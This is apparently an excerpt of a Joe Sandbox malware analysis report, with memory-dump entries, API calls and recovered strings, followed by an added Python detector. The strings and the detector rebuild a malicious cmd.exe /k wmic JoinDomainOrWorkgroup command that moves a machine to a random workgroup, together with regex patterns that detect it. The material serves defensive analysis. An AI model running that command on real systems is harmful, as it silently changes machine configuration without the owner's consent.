                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
                                • Instruction ID: 422d110c87409b42cc3d40fc4940c954b3565e0feb40eec272749ef0314fdf92
                                • Opcode Fuzzy Hash: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
                                • Instruction Fuzzy Hash: 72D0CA74200200EFCB80DF00D848B22BBB1AF5030AF2088EEE6454A262DB338C97DF06
                                APIs
                                • ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
                                • Instruction ID: e981d7f3aa070d6dd922208303280657e88cd7f5e4e9c7b1544f0cb6238b2e4d
                                • Opcode Fuzzy Hash: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
                                • Instruction Fuzzy Hash: 03D0CA70200200EFCB40DF10E808B25B7B2BB9430AF2088EEE6000A26AD7338C17EF06
                                APIs
                                • _rand.LIBCMT ref: 0042C100
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 0042C35C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmp
                                 • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ExecuteShell_rand
                                • String ID: && exit$/k $A$B$C$D$E$F$G$H$I$Information$It has been modified successfully!$J$K$L$M$N$O$P$Q$R$S$T$U$V$X$Z$cmd.exe$open$wmic computersystem where Name="%COMPUTERNAME%" call JoinDomainOrWorkgroup Name="
                                • API String ID: 1896964485-2690276116
                                • Opcode ID: 811ddf9e782262980362ce7164d2efbbdf5730906a940ffc24afd2e6e205af75
                                • Instruction ID: cb036a8d72366a6edcd4fafc81f260ed520eb514809b80d5e2b6a7ae744668f3
                                • Opcode Fuzzy Hash: 811ddf9e782262980362ce7164d2efbbdf5730906a940ffc24afd2e6e205af75
                                • Instruction Fuzzy Hash: F2E1AF712087818FD305CB28C884B1BBBE1BF95318F548A5DF4A59B3D2D779E805CB9A
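The string set attached to the function above (cmd.exe, open, "/k ", "&& exit", a pool of capital letters next to a _rand call, and the fragment wmic computersystem where Name="%COMPUTERNAME%" call JoinDomainOrWorkgroup Name=") is consistent with the sample assembling a randomised workgroup name and handing a wmic workgroup-change command to cmd.exe through ShellExecuteA; cmd.exe is needed because it is what expands %COMPUTERNAME%. The following is an added example and is not part of the Joe Sandbox report nor the sample's own code: a detection over constructed process-creation command lines (the shape of Sysmon Event ID 1 / Security 4688 CommandLine fields) that flags the WMI workgroup change regardless of the random name. The reassembled parameter string in inferred_parameters, the name length, and the sample log lines are assumptions for illustration.

```python
import random
import re

# Letter pool exactly as listed in the report's String ID for this function
# (W and Y are absent there); used only to build an illustrative name.
LETTER_POOL = "ABCDEFGHIJKLMNOPQRSTUVXZ"


def random_workgroup_name(length=8, rng=random):
    """Illustrative random name built from the report's letter pool.
    The real length used by the sample is unknown (assumption)."""
    return "".join(rng.choice(LETTER_POOL) for _ in range(length))


def inferred_parameters(workgroup_name):
    """Inferred (assumption) cmd.exe parameter string, assembled from the
    fragments visible in the report: '/k ' + wmic command + '&& exit'."""
    return (
        '/k wmic computersystem where Name="%COMPUTERNAME%" '
        'call JoinDomainOrWorkgroup Name="' + workgroup_name + '" && exit'
    )


# Constructed command lines (not captured from the sandbox run).
SAMPLE_COMMAND_LINES = [
    "cmd.exe " + inferred_parameters("QKZBTRHA"),
    'C:\\Windows\\System32\\wbem\\WMIC.exe computersystem where Name="WS01" '
    'call JoinDomainOrWorkgroup Name="PRINT"',
    "wmic computersystem get Name,Domain",
    "cmd.exe /c echo Information && exit",
    'powershell.exe -c "Add-Computer -WorkgroupName HOME"',
]

# wmic ... computersystem ... JoinDomainOrWorkgroup Name=<target>
JOIN_RE = re.compile(
    r'\bwmic(?:\.exe)?\b[^\n]*?\bcomputersystem\b[^\n]*?'
    r'\bJoinDomainOrWorkgroup\s+Name\s*=\s*"?([A-Za-z0-9_.-]+)',
    re.IGNORECASE,
)
# cmd.exe /k or /c wrapper, which the sample's strings suggest
CMD_WRAPPER_RE = re.compile(r"\bcmd(?:\.exe)?\s+/[kc]\b", re.IGNORECASE)


def parse_finding(cmdline):
    """Return a finding dict for a workgroup-change command line, else None."""
    m = JOIN_RE.search(cmdline)
    if not m:
        return None
    target = m.group(1)
    via_cmd = bool(CMD_WRAPPER_RE.search(cmdline))
    # Heuristic: an all-uppercase alphabetic name of 6+ letters looks generated,
    # which matches the letter pool + _rand combination seen in the report.
    random_like = len(target) >= 6 and target.isalpha() and target.isupper()
    return {
        "workgroup": target,
        "via_cmd": via_cmd,
        "random_like": random_like,
        "severity": "high" if via_cmd and random_like else "medium",
    }


def scan(command_lines):
    """Run the detector over an iterable of CommandLine values."""
    return [f for f in (parse_finding(c) for c in command_lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(finding)
```

Any JoinDomainOrWorkgroup call from wmic is rare enough on workstations to be worth a medium alert on its own; the cmd.exe wrapper plus a generated-looking name is what raises it to high here. Legitimate domain joins usually go through netdom, Add-Computer or the GUI rather than a cmd.exe /k wmic one-liner.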